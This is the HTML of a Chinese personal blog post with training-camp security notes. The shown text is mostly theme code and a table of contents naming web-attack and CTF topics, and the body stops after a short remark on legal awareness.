<!DOCTYPE html>
<html style="display: none;" lang="zh">
    <head>
    <meta charset="utf-8">
    <!--
        © Material Theme
        https://github.com/viosey/hexo-theme-material
        Version: 1.5.2 -->
    <script>
        window.materialVersion = "1.5.2"
        // Delete localstorage with these tags
        window.oldVersion = [
            'codestartv1',
            '1.3.4',
            '1.4.0',
            '1.4.0b1',
            '1.5.0'
        ]
    </script>

    <!-- dns prefetch -->
    <meta http-equiv="x-dns-prefetch-control" content="on">














    <!-- Meta & Info -->
    <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1">
    <meta name="renderer" content="webkit">
    <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=no">

    <!-- Title -->
    
    <title>
        
            安恒笔记（稍微整理版） | 
        
        RingFa1l
    </title>

    <!-- Favicons -->
    <link rel="icon shortcut" type="image/ico" href="/img/ling.png">
    <link rel="icon" href="/img/ling.png">

    <meta name="format-detection" content="telephone=no"/>
    <meta name="description" itemprop="description" content="">
    <meta name="keywords" content="null,搅屎棍之路">
    <meta name="theme-color" content="#0097A7">

    <!-- Disable Fucking Bloody Baidu Tranformation -->
    <meta http-equiv="Cache-Control" content="no-transform" />
    <meta http-equiv="Cache-Control" content="no-siteapp" />

    <!--[if lte IE 9]>
        <link rel="stylesheet" href="/css/ie-blocker.css">

        
            <script src="/js/ie-blocker.zhCN.js"></script>
        
    <![endif]-->

    <!-- Import lsloader -->
    <script>(function(){window.lsloader={jsRunSequence:[],jsnamemap:{},cssnamemap:{}};lsloader.removeLS=function(a){try{localStorage.removeItem(a)}catch(b){}};lsloader.setLS=function(a,c){try{localStorage.setItem(a,c)}catch(b){}};lsloader.getLS=function(a){var c="";try{c=localStorage.getItem(a)}catch(b){c=""}return c};versionString="/*"+(window.materialVersion||"unknownVersion")+"*/";lsloader.clean=function(){try{var b=[];for(var a=0;a<localStorage.length;a++){b.push(localStorage.key(a))}b.forEach(function(e){var f=lsloader.getLS(e);if(window.oldVersion){var d=window.oldVersion.reduce(function(g,h){return g||f.indexOf("/*"+h+"*/")!==-1},false);if(d){lsloader.removeLS(e)}}})}catch(c){}};lsloader.clean();lsloader.load=function(f,a,b,d){if(typeof b==="boolean"){d=b;b=undefined}d=d||false;b=b||function(){};var e;e=this.getLS(f);if(e&&e.indexOf(versionString)===-1){this.removeLS(f);this.requestResource(f,a,b,d);return}if(e){var c=e.split(versionString)[0];if(c!=a){console.log("reload:"+a);this.removeLS(f);this.requestResource(f,a,b,d);return}e=e.split(versionString)[1];if(d){this.jsRunSequence.push({name:f,code:e});this.runjs(a,f,e)}else{document.getElementById(f).appendChild(document.createTextNode(e));b()}}else{this.requestResource(f,a,b,d)}};lsloader.requestResource=function(b,e,a,c){var d=this;if(c){this.iojs(e,b,function(h,f,g){d.setLS(f,h+versionString+g);d.runjs(h,f,g)})}else{this.iocss(e,b,function(f){document.getElementById(b).appendChild(document.createTextNode(f));d.setLS(b,e+versionString+f)},a)}};lsloader.iojs=function(d,b,g){var a=this;a.jsRunSequence.push({name:b,code:""});try{var f=new XMLHttpRequest();f.open("get",d,true);f.onreadystatechange=function(){if(f.readyState==4){if((f.status>=200&&f.status<300)||f.status==304){if(f.response!=""){g(d,b,f.response);return}}a.jsfallback(d,b)}};f.send(null)}catch(c){a.jsfallback(d,b)}};lsloader.iocss=function(f,c,h,a){var b=this;try{var g=new XMLHttpRequest();g.open("get",f,true);g.onreadystatechange=function(){if(g.readyState==4){if((g.status>=200&&g.status<300)||g.status==304){if(g.response!=""){h(g.response);a();return}}b.cssfallback(f,c,a)}};g.send(null)}catch(d){b.cssfallback(f,c,a)}};lsloader.iofonts=function(f,c,h,a){var b=this;try{var g=new XMLHttpRequest();g.open("get",f,true);g.onreadystatechange=function(){if(g.readyState==4){if((g.status>=200&&g.status<300)||g.status==304){if(g.response!=""){h(g.response);a();return}}b.cssfallback(f,c,a)}};g.send(null)}catch(d){b.cssfallback(f,c,a)}};lsloader.runjs=function(f,c,e){if(!!c&&!!e){for(var b in this.jsRunSequence){if(this.jsRunSequence[b].name==c){this.jsRunSequence[b].code=e}}}if(!!this.jsRunSequence[0]&&!!this.jsRunSequence[0].code&&this.jsRunSequence[0].status!="failed"){var a=document.createElement("script");a.appendChild(document.createTextNode(this.jsRunSequence[0].code));a.type="text/javascript";document.getElementsByTagName("head")[0].appendChild(a);this.jsRunSequence.shift();if(this.jsRunSequence.length>0){this.runjs()}}else{if(!!this.jsRunSequence[0]&&this.jsRunSequence[0].status=="failed"){var d=this;var a=document.createElement("script");a.src=this.jsRunSequence[0].path;a.type="text/javascript";this.jsRunSequence[0].status="loading";a.onload=function(){d.jsRunSequence.shift();if(d.jsRunSequence.length>0){d.runjs()}};document.body.appendChild(a)}}};lsloader.tagLoad=function(b,a){this.jsRunSequence.push({name:a,code:"",path:b,status:"failed"});this.runjs()};lsloader.jsfallback=function(c,b){if(!!this.jsnamemap[b]){return}else{this.jsnamemap[b]=b}for(var a in this.jsRunSequence){if(this.jsRunSequence[a].name==b){this.jsRunSequence[a].code="";this.jsRunSequence[a].status="failed";this.jsRunSequence[a].path=c}}this.runjs()};lsloader.cssfallback=function(e,c,b){if(!!this.cssnamemap[c]){return}else{this.cssnamemap[c]=1}var d=document.createElement("link");d.type="text/css";d.href=e;d.rel="stylesheet";d.onload=d.onerror=b;var a=document.getElementsByTagName("script")[0];a.parentNode.insertBefore(d,a)};lsloader.runInlineScript=function(c,b){var a=document.getElementById(b).innerText;this.jsRunSequence.push({name:c,code:a});this.runjs()}})();</script>

    <!-- Import queue -->
    <script>function Queue(){this.dataStore=[];this.offer=b;this.poll=d;this.execNext=a;this.debug=false;this.startDebug=c;function b(e){if(this.debug){console.log("Offered a Queued Function.")}if(typeof e==="function"){this.dataStore.push(e)}else{console.log("You must offer a function.")}}function d(){if(this.debug){console.log("Polled a Queued Function.")}return this.dataStore.shift()}function a(){var e=this.poll();if(e!==undefined){if(this.debug){console.log("Run a Queued Function.")}e()}}function c(){this.debug=true}}var queue=new Queue();</script>

    <!-- Import CSS -->
    
        <style id="material_css"></style><script>if(typeof window.lsLoadCSSMaxNums === "undefined")window.lsLoadCSSMaxNums = 0;window.lsLoadCSSMaxNums++;lsloader.load("material_css","/css/material.min.css?Z7a72R1E4SxzBKR/WGctOA==",function(){if(typeof window.lsLoadCSSNums === "undefined")window.lsLoadCSSNums = 0;window.lsLoadCSSNums++;if(window.lsLoadCSSNums == window.lsLoadCSSMaxNums)document.documentElement.style.display="";}, false)</script>
        <style id="style_css"></style><script>if(typeof window.lsLoadCSSMaxNums === "undefined")window.lsLoadCSSMaxNums = 0;window.lsLoadCSSMaxNums++;lsloader.load("style_css","/css/style.min.css?MKetZV3cUTfDxvMffaOezg==",function(){if(typeof window.lsLoadCSSNums === "undefined")window.lsLoadCSSNums = 0;window.lsLoadCSSNums++;if(window.lsLoadCSSNums == window.lsLoadCSSMaxNums)document.documentElement.style.display="";}, false)</script>

        

    

    

    <!-- Config CSS -->

<!-- Other Styles -->
<style>
  body, html {
    font-family: Roboto, "Helvetica Neue", Helvetica, "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei", "微软雅黑", Arial, sans-serif;
    overflow-x: hidden !important;
  }
  
  code {
    font-family: Consolas, Monaco, 'Andale Mono', 'Ubuntu Mono', monospace;
  }

  a {
    color: #00838F;
  }

  .mdl-card__media,
  #search-label,
  #search-form-label:after,
  #scheme-Paradox .hot_tags-count,
  #scheme-Paradox .sidebar_archives-count,
  #scheme-Paradox .sidebar-colored .sidebar-header,
  #scheme-Paradox .sidebar-colored .sidebar-badge{
    background-color: #0097A7 !important;
  }

  /* Sidebar User Drop Down Menu Text Color */
  #scheme-Paradox .sidebar-colored .sidebar-nav>.dropdown>.dropdown-menu>li>a:hover,
  #scheme-Paradox .sidebar-colored .sidebar-nav>.dropdown>.dropdown-menu>li>a:focus {
    color: #0097A7 !important;
  }

  #post_entry-right-info,
  .sidebar-colored .sidebar-nav li:hover > a,
  .sidebar-colored .sidebar-nav li:hover > a i,
  .sidebar-colored .sidebar-nav li > a:hover,
  .sidebar-colored .sidebar-nav li > a:hover i,
  .sidebar-colored .sidebar-nav li > a:focus i,
  .sidebar-colored .sidebar-nav > .open > a,
  .sidebar-colored .sidebar-nav > .open > a:hover,
  .sidebar-colored .sidebar-nav > .open > a:focus,
  #ds-reset #ds-ctx .ds-ctx-entry .ds-ctx-head a {
    color: #0097A7 !important;
  }

  .toTop {
    background: #757575 !important;
  }

  .material-layout .material-post>.material-nav,
  .material-layout .material-index>.material-nav,
  .material-nav a {
    color: #757575;
  }

  #scheme-Paradox .MD-burger-layer {
    background-color: #757575;
  }

  #scheme-Paradox #post-toc-trigger-btn {
    color: #757575;
  }

  .post-toc a:hover {
    color: #00838F;
    text-decoration: underline;
  }

</style>


<!-- Theme Background Related-->

    <style>
      body{
        background-color: #F5F5F5;
      }

      /* blog_info bottom background */
      #scheme-Paradox .material-layout .something-else .mdl-card__supporting-text{
        background-color: #fff;
      }
    </style>




<!-- Fade Effect -->

    <style>
      .fade {
        transition: all 800ms linear;
        -webkit-transform: translate3d(0,0,0);
        -moz-transform: translate3d(0,0,0);
        -ms-transform: translate3d(0,0,0);
        -o-transform: translate3d(0,0,0);
        transform: translate3d(0,0,0);
        opacity: 1;
      }

      .fade.out{
        opacity: 0;
      }
    </style>


<!-- Import Font -->
<!-- Import Roboto -->

    <link href="https://fonts.googleapis.com/css?family=Roboto:300,400,500" rel="stylesheet">


<!-- Import Material Icons -->


    <style id="material_icons"></style><script>if(typeof window.lsLoadCSSMaxNums === "undefined")window.lsLoadCSSMaxNums = 0;window.lsLoadCSSMaxNums++;lsloader.load("material_icons","/css/material-icons.css?pqhB/Rd/ab0H2+kZp0RDmw==",function(){if(typeof window.lsLoadCSSNums === "undefined")window.lsLoadCSSNums = 0;window.lsLoadCSSNums++;if(window.lsLoadCSSNums == window.lsLoadCSSMaxNums)document.documentElement.style.display="";}, false)</script>




    <!-- Import jQuery -->
    
        <script>lsloader.load("jq_js","/js/jquery.min.js?qcusAULNeBksqffqUM2+Ig==", true)</script>
    

    <!-- WebAPP Icons -->
    <meta name="mobile-web-app-capable" content="yes">
    <meta name="application-name" content="RingFa1l">
    <meta name="msapplication-starturl" content="http://ringfall.me/2017/07/23/ah/">
    <meta name="msapplication-navbutton-color" content="#0097A7">
    <meta name="apple-mobile-web-app-capable" content="yes">
    <meta name="apple-mobile-web-app-title" content="RingFa1l">
    <meta name="apple-mobile-web-app-status-bar-style" content="black">
    <link rel="apple-touch-icon" href="/img/ling.png">

    <!-- Site Verification -->
    
    

    <!-- RSS -->
    

    <!-- The Open Graph protocol -->
    <meta property="og:url" content="http://ringfall.me/2017/07/23/ah/">
    <meta property="og:type" content="blog">
    <meta property="og:title" content="安恒笔记（稍微整理版） | RingFa1l">
    <meta property="og:image" content="/img/ling.png">
    <meta property="og:description" content="">
    <meta property="og:article:tag" content="搅屎棍之路"> 

    
        <meta property="article:published_time" content="Sun Jul 23 2017 09:00:05 GMT+0800">
        <meta property="article:modified_time" content="Tue Jan 02 2018 14:11:04 GMT+0800">
    

    <!-- The Twitter Card protocol -->
    <meta name="twitter:card" content="summary_large_image">

    <!-- Add canonical link for SEO -->
    
        <link rel="canonical" href="http://ringfall.me/2017/07/23/ah/index.html" />
    

    <!-- Structured-data for SEO -->
    
        


<script type="application/ld+json">
{
    "@context": "https://schema.org",
    "@type": "BlogPosting",
    "mainEntityOfPage": "http://ringfall.me/2017/07/23/ah/index.html",
    "headline": "安恒笔记（稍微整理版）",
    "datePublished": "Sun Jul 23 2017 09:00:05 GMT+0800",
    "dateModified": "Tue Jan 02 2018 14:11:04 GMT+0800",
    "author": {
        "@type": "Person",
        "name": "铃落",
        "image": {
            "@type": "ImageObject",
            "url": "/img/2.jpg"
        },
        "description": "铃音不才，纷落为歌。"
    },
    "publisher": {
        "@type": "Organization",
        "name": "RingFa1l",
        "logo": {
            "@type":"ImageObject",
            "url": "/img/ling.png"
        }
    },
    "keywords": ",搅屎棍之路null",
    "description": "",
}
</script>


    

    <!-- Analytics -->
    
    
    

    <!-- Custom Head -->
    

</head>


    
        <body id="scheme-Paradox" class="lazy">
            <div class="material-layout  mdl-js-layout has-drawer is-upgraded">
                

                <!-- Main Container -->
                <main class="material-layout__content" id="main">

                    <!-- Top Anchor -->
                    <div id="top"></div>

                    
                        <!-- Hamburger Button -->
                        <button class="MD-burger-icon sidebar-toggle">
                            <span class="MD-burger-layer"></span>
                        </button>
                    

                    <!-- Post TOC -->

    
    <!-- Back Button -->
    <!--
    <div class="material-back" id="backhome-div" tabindex="0">
        <a class="mdl-button mdl-js-button mdl-js-ripple-effect mdl-button--icon"
           href="#" onclick="window.history.back();return false;"
           target="_self"
           role="button"
           data-upgraded=",MaterialButton,MaterialRipple">
            <i class="material-icons" role="presentation">arrow_back</i>
            <span class="mdl-button__ripple-container">
                <span class="mdl-ripple"></span>
            </span>
        </a>
    </div>
    -->


    <!-- Left aligned menu below button -->
    
    
    <button id="post-toc-trigger-btn"
        class="mdl-button mdl-js-button mdl-button--icon">
        <i class="material-icons">format_list_numbered</i>
    </button>

    <ul class="post-toc-wrap mdl-menu mdl-menu--bottom-left mdl-js-menu mdl-js-ripple-effect" for="post-toc-trigger-btn" style="max-height:80vh; overflow-y:scroll;">
        <ol class="post-toc"><li class="post-toc-item post-toc-level-2"><a class="post-toc-link" href="#选拔"><span class="post-toc-number">1.</span> <span class="post-toc-text">选拔</span></a></li><li class="post-toc-item post-toc-level-2"><a class="post-toc-link" href="#day1"><span class="post-toc-number">2.</span> <span class="post-toc-text">day1</span></a><ol class="post-toc-child"><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#法律"><span class="post-toc-number">2.1.</span> <span class="post-toc-text">法律</span></a></li><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#社工"><span class="post-toc-number">2.2.</span> <span class="post-toc-text">社工</span></a></li></ol></li><li class="post-toc-item post-toc-level-2"><a class="post-toc-link" href="#day2-web"><span class="post-toc-number">3.</span> <span class="post-toc-text">day2 web</span></a><ol class="post-toc-child"><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#书"><span class="post-toc-number">3.1.</span> <span class="post-toc-text">书</span></a></li><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#网页流程"><span class="post-toc-number">3.2.</span> <span class="post-toc-text">网页流程</span></a></li><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#测试"><span class="post-toc-number">3.3.</span> <span class="post-toc-text">测试</span></a></li><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#渗透流程"><span class="post-toc-number">3.4.</span> <span class="post-toc-text">渗透流程</span></a><ol class="post-toc-child"><li class="post-toc-item post-toc-level-4"><a class="post-toc-link" href="#1-信息收集："><span class="post-toc-number">3.4.1.</span> <span class="post-toc-text">1.信息收集：</span></a></li><li class="post-toc-item post-toc-level-4"><a class="post-toc-link" href="#2-尝试漏洞-进入内网"><span class="post-toc-number">3.4.2.</span> <span class="post-toc-text">2.尝试漏洞(进入内网)</span></a></li><li class="post-toc-item post-toc-level-4"><a class="post-toc-link" href="#3-可能的问题：漏洞没打补丁"><span class="post-toc-number">3.4.3.</span> <span class="post-toc-text">3.可能的问题：漏洞没打补丁</span></a></li></ol></li><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#弱口令"><span class="post-toc-number">3.5.</span> <span class="post-toc-text">弱口令</span></a><ol class="post-toc-child"><li class="post-toc-item post-toc-level-4"><a class="post-toc-link" href="#暴力破解-burp演示"><span class="post-toc-number">3.5.1.</span> <span class="post-toc-text">暴力破解(burp演示)</span></a></li><li class="post-toc-item post-toc-level-4"><a class="post-toc-link" href="#工具"><span class="post-toc-number">3.5.2.</span> <span class="post-toc-text">工具</span></a></li><li class="post-toc-item post-toc-level-4"><a class="post-toc-link" href="#测试一发"><span class="post-toc-number">3.5.3.</span> <span class="post-toc-text">测试一发~</span></a></li></ol></li><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#SQL注入（针对每一种数据）"><span class="post-toc-number">3.6.</span> <span class="post-toc-text">SQL注入（针对每一种数据）</span></a><ol class="post-toc-child"><li class="post-toc-item post-toc-level-4"><a class="post-toc-link" href="#工具-1"><span class="post-toc-number">3.6.1.</span> <span class="post-toc-text">工具</span></a></li><li class="post-toc-item post-toc-level-4"><a class="post-toc-link" href="#acess"><span class="post-toc-number">3.6.2.</span> <span class="post-toc-text">acess</span></a></li><li class="post-toc-item post-toc-level-4"><a class="post-toc-link" href="#mysql"><span class="post-toc-number">3.6.3.</span> <span class="post-toc-text">mysql</span></a></li></ol></li><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#上传漏洞"><span class="post-toc-number">3.7.</span> <span class="post-toc-text">上传漏洞</span></a><ol class="post-toc-child"><li class="post-toc-item post-toc-level-4"><a class="post-toc-link" href="#js验证"><span class="post-toc-number">3.7.1.</span> <span class="post-toc-text">js验证</span></a></li><li class="post-toc-item post-toc-level-4"><a class="post-toc-link" href="#MIME验证"><span class="post-toc-number">3.7.2.</span> <span class="post-toc-text">MIME验证</span></a></li><li class="post-toc-item post-toc-level-4"><a class="post-toc-link" href="#内容验证"><span class="post-toc-number">3.7.3.</span> <span class="post-toc-text">内容验证</span></a></li><li class="post-toc-item post-toc-level-4"><a class="post-toc-link" href="#服务端扩展名-后缀名-验证"><span class="post-toc-number">3.7.4.</span> <span class="post-toc-text">服务端扩展名(后缀名)验证</span></a><ol class="post-toc-child"><li class="post-toc-item post-toc-level-5"><a class="post-toc-link" href="#操作系统-window"><span class="post-toc-number">3.7.4.1.</span> <span class="post-toc-text">操作系统 window</span></a></li><li class="post-toc-item post-toc-level-5"><a class="post-toc-link" href="#中间件"><span class="post-toc-number">3.7.4.2.</span> <span class="post-toc-text">中间件</span></a><ol class="post-toc-child"><li class="post-toc-item post-toc-level-6"><a class="post-toc-link" href="#IIS-6"><span class="post-toc-number">3.7.4.2.1.</span> <span class="post-toc-text">IIS 6</span></a></li><li class="post-toc-item post-toc-level-6"><a class="post-toc-link" href="#IIS-7"><span class="post-toc-number">3.7.4.2.2.</span> <span class="post-toc-text">IIS 7</span></a></li><li class="post-toc-item post-toc-level-6"><a class="post-toc-link" href="#nginx"><span class="post-toc-number">3.7.4.2.3.</span> <span class="post-toc-text">nginx</span></a></li><li class="post-toc-item post-toc-level-6"><a class="post-toc-link" href="#light"><span class="post-toc-number">3.7.4.2.4.</span> <span class="post-toc-text">light</span></a></li><li class="post-toc-item post-toc-level-6"><a class="post-toc-link" href="#apache"><span class="post-toc-number">3.7.4.2.5.</span> <span class="post-toc-text">apache</span></a></li></ol></li></ol></li><li class="post-toc-item post-toc-level-4"><a class="post-toc-link" href="#代码层"><span class="post-toc-number">3.7.5.</span> <span class="post-toc-text">代码层</span></a></li><li class="post-toc-item post-toc-level-4"><a class="post-toc-link" href="#特殊上传漏洞"><span class="post-toc-number">3.7.6.</span> <span class="post-toc-text">特殊上传漏洞</span></a><ol class="post-toc-child"><li class="post-toc-item post-toc-level-5"><a class="post-toc-link" href="#目录验证上传"><span class="post-toc-number">3.7.6.1.</span> <span class="post-toc-text">目录验证上传</span></a></li><li class="post-toc-item post-toc-level-5"><a class="post-toc-link" href="#双文件上传"><span class="post-toc-number">3.7.6.2.</span> <span class="post-toc-text">双文件上传</span></a></li></ol></li><li class="post-toc-item post-toc-level-4"><a class="post-toc-link" href="#编辑漏洞-ewebedit-fck"><span class="post-toc-number">3.7.7.</span> <span class="post-toc-text">编辑漏洞(ewebedit fck)</span></a></li></ol></li><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#文件包含"><span class="post-toc-number">3.8.</span> <span class="post-toc-text">文件包含</span></a><ol class="post-toc-child"><li class="post-toc-item post-toc-level-4"><a class="post-toc-link" href="#本地"><span class="post-toc-number">3.8.1.</span> <span class="post-toc-text">本地</span></a></li><li class="post-toc-item post-toc-level-4"><a class="post-toc-link" href="#IIS-短标签"><span class="post-toc-number">3.8.2.</span> <span class="post-toc-text">IIS 短标签</span></a></li><li class="post-toc-item post-toc-level-4"><a class="post-toc-link" href="#远程文件包含"><span class="post-toc-number">3.8.3.</span> <span class="post-toc-text">远程文件包含</span></a></li><li class="post-toc-item post-toc-level-4"><a class="post-toc-link" href="#伪协议"><span class="post-toc-number">3.8.4.</span> <span class="post-toc-text">伪协议</span></a></li></ol></li></ol></li><li class="post-toc-item post-toc-level-2"><a class="post-toc-link" href="#day3-web"><span class="post-toc-number">4.</span> <span class="post-toc-text">day3 web</span></a><ol class="post-toc-child"><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#XSS"><span class="post-toc-number">4.1.</span> <span class="post-toc-text">XSS</span></a></li><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#目录遍历"><span class="post-toc-number">4.2.</span> <span class="post-toc-text">目录遍历</span></a></li><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#任意文件下载"><span class="post-toc-number">4.3.</span> <span class="post-toc-text">任意文件下载</span></a></li><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#任意文件删除"><span class="post-toc-number">4.4.</span> <span class="post-toc-text">任意文件删除</span></a></li><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#防护"><span class="post-toc-number">4.5.</span> <span class="post-toc-text">防护</span></a></li><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#命令执行"><span class="post-toc-number">4.6.</span> <span class="post-toc-text">命令执行</span></a><ol class="post-toc-child"><li class="post-toc-item post-toc-level-4"><a class="post-toc-link" href="#绕过手法"><span class="post-toc-number">4.6.1.</span> <span class="post-toc-text">绕过手法</span></a></li><li class="post-toc-item post-toc-level-4"><a class="post-toc-link" href="#防护-1"><span class="post-toc-number">4.6.2.</span> <span class="post-toc-text">防护</span></a></li></ol></li><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#越权-逻辑漏洞"><span class="post-toc-number">4.7.</span> <span class="post-toc-text">越权 逻辑漏洞</span></a></li></ol></li><li class="post-toc-item post-toc-level-2"><a class="post-toc-link" href="#day3-re"><span class="post-toc-number">5.</span> <span class="post-toc-text">day3 re</span></a><ol class="post-toc-child"><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#书-1"><span class="post-toc-number">5.1.</span> <span class="post-toc-text">书</span></a></li><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#数据存储顺序"><span class="post-toc-number">5.2.</span> <span class="post-toc-text">数据存储顺序</span></a></li><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#存储格式"><span class="post-toc-number">5.3.</span> <span class="post-toc-text">存储格式</span></a></li><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#windows基本架构"><span class="post-toc-number">5.4.</span> <span class="post-toc-text">windows基本架构</span></a></li><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#PE文件结构"><span class="post-toc-number">5.5.</span> <span class="post-toc-text">PE文件结构</span></a></li><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#工具-2"><span class="post-toc-number">5.6.</span> <span class="post-toc-text">工具</span></a></li></ol></li><li class="post-toc-item post-toc-level-2"><a class="post-toc-link" href="#day4-pwn"><span class="post-toc-number">6.</span> <span class="post-toc-text">day4 pwn</span></a><ol class="post-toc-child"><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#书-2"><span class="post-toc-number">6.1.</span> <span class="post-toc-text">书</span></a></li></ol></li><li class="post-toc-item post-toc-level-2"><a class="post-toc-link" href="#day5-crypto"><span class="post-toc-number">7.</span> <span class="post-toc-text">day5 crypto</span></a></li><li class="post-toc-item post-toc-level-2"><a class="post-toc-link" href="#day5-misc"><span class="post-toc-number">8.</span> <span class="post-toc-text">day5 misc</span></a></li><li class="post-toc-item post-toc-level-2"><a class="post-toc-link" href="#day6-考核"><span class="post-toc-number">9.</span> <span class="post-toc-text">day6 考核</span></a></li><li class="post-toc-item post-toc-level-2"><a class="post-toc-link" href="#day7-讲解"><span class="post-toc-number">10.</span> <span class="post-toc-text">day7 讲解</span></a><ol class="post-toc-child"><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#原题"><span class="post-toc-number">10.1.</span> <span class="post-toc-text">原题</span></a></li><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#waf"><span class="post-toc-number">10.2.</span> <span class="post-toc-text">waf</span></a></li><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#exploit"><span class="post-toc-number">10.3.</span> <span class="post-toc-text">exploit</span></a></li><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#be-allowed"><span class="post-toc-number">10.4.</span> <span class="post-toc-text">be allowed</span></a></li><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#register"><span class="post-toc-number">10.5.</span> <span class="post-toc-text">register</span></a></li><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#研究生的秘密"><span class="post-toc-number">10.6.</span> <span class="post-toc-text">研究生的秘密</span></a></li><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#manager1"><span class="post-toc-number">10.7.</span> <span class="post-toc-text">manager1</span></a></li><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#manager2"><span class="post-toc-number">10.8.</span> <span class="post-toc-text">manager2</span></a></li></ol></li><li class="post-toc-item post-toc-level-2"><a class="post-toc-link" href="#肥家家。。。"><span class="post-toc-number">11.</span> <span class="post-toc-text">肥家家。。。</span></a></li></ol>
    </ul>
    




<!-- Layouts -->

    <!-- Post Module -->
    <div class="material-post_container">

        <div class="material-post mdl-grid">
            <div class="mdl-card mdl-shadow--4dp mdl-cell mdl-cell--12-col">

                <!-- Post Header(Thumbnail & Title) -->
                
    <!-- Paradox Post Header -->
    
        <!-- Custom Thumbnail -->
        <div class="post_thumbnail-custom mdl-card__media mdl-color-text--grey-50" style="background-image:url(https://s1.ax1x.com/2018/01/01/pSovyF.png)">
    
            <p class="article-headline-p">
                安恒笔记（稍微整理版）
            </p>
        </div>





                
                    <!-- Paradox Post Info -->
                    <div class="mdl-color-text--grey-700 mdl-card__supporting-text meta">

    <!-- Author Avatar -->
    <div id="author-avatar">
        <img src="/img/2.jpg" width="44px" height="44px" alt="Author Avatar"/>
    </div>
    <!-- Author Name & Date -->
    <div>
        <strong>铃落</strong>
        <span>7月 23, 2017</span>
    </div>

    <div class="section-spacer"></div>

    <!-- Favorite -->
    <!--
        <button id="article-functions-like-button" class="mdl-button mdl-js-button mdl-js-ripple-effect mdl-button--icon btn-like">
            <i class="material-icons" role="presentation">favorite</i>
            <span class="visuallyhidden">favorites</span>
        </button>
    -->

    <!-- Qrcode -->
    

    <!-- Tags (bookmark) -->
    
    <button id="article-functions-viewtags-button" class="mdl-button mdl-js-button mdl-js-ripple-effect mdl-button--icon">
        <i class="material-icons" role="presentation">bookmark</i>
        <span class="visuallyhidden">bookmark</span>
    </button>
    <ul class="mdl-menu mdl-menu--bottom-right mdl-js-menu mdl-js-ripple-effect" for="article-functions-viewtags-button">
        <li class="mdl-menu__item">
        <a class="post_tag-link" href="/tags/搅屎棍之路/">搅屎棍之路</a>
    </ul>
    

    <!-- Share -->
    
        <button id="article-fuctions-share-button" class="mdl-button mdl-js-button mdl-js-ripple-effect mdl-button--icon">
    <i class="material-icons" role="presentation">share</i>
    <span class="visuallyhidden">share</span>
</button>
<ul class="mdl-menu mdl-menu--bottom-right mdl-js-menu mdl-js-ripple-effect" for="article-fuctions-share-button">
    

    

    <!-- Share Weibo -->
    
        <a class="post_share-link" href="http://service.weibo.com/share/share.php?appkey=&title=安恒笔记（稍微整理版）&url=http://ringfall.me/2017/07/23/ah/index.html&pic=http://ringfall.me/img/ling.png&searchPic=false&style=simple" target="_blank">
            <li class="mdl-menu__item">
                分享到微博
            </li>
        </a>
    

    <!-- Share Twitter -->
    
        <a class="post_share-link" href="https://twitter.com/intent/tweet?text=安恒笔记（稍微整理版）&url=http://ringfall.me/2017/07/23/ah/index.html&via=铃落" target="_blank">
            <li class="mdl-menu__item">
                分享到 Twitter
            </li>
        </a>
    

    <!-- Share Facebook -->
    
        <a class="post_share-link" href="https://www.facebook.com/sharer/sharer.php?u=http://ringfall.me/2017/07/23/ah/index.html" target="_blank">
            <li class="mdl-menu__item">
                分享到 Facebook
            </li>
        </a>
    

    <!-- Share Google+ -->
    
        <a class="post_share-link" href="https://plus.google.com/share?url=http://ringfall.me/2017/07/23/ah/index.html" target="_blank">
            <li class="mdl-menu__item">
                分享到 Google+
            </li>
        </a>
    

    <!-- Share LinkedIn -->
    

    <!-- Share QQ -->
    
        <a class="post_share-link" href="http://connect.qq.com/widget/shareqq/index.html?site=RingFa1l&title=安恒笔记（稍微整理版）&summary=null&pics=http://ringfall.me/img/ling.png&url=http://ringfall.me/2017/07/23/ah/index.html" target="_blank">
            <li class="mdl-menu__item">
                分享到 QQ
            </li>
        </a>
    

    <!-- Share Telegram -->
    
</ul>

    
</div>

                

                <!-- Post Content -->
                <div id="post-content" class="mdl-color-text--grey-700 mdl-card__supporting-text fade out">
    
        <p>无修版在这儿<br><a href="./20170723.txt">web1</a><br><a href="./20170724.txt">web2</a></p>
<h2 id="选拔"><a href="#选拔" class="headerlink" title="选拔"></a>选拔</h2><p>神它喵的题目。。神它喵最高分。。<br>附上<a href="./anheng.docx">野鸡题目和窝各种姿势百度的答案</a></p>
<h2 id="day1"><a href="#day1" class="headerlink" title="day1"></a>day1</h2><h3 id="法律"><a href="#法律" class="headerlink" title="法律"></a>法律</h3><p>balabalabala…<br>总而言之就是要有法律意识2333一不小心就进去了</p>
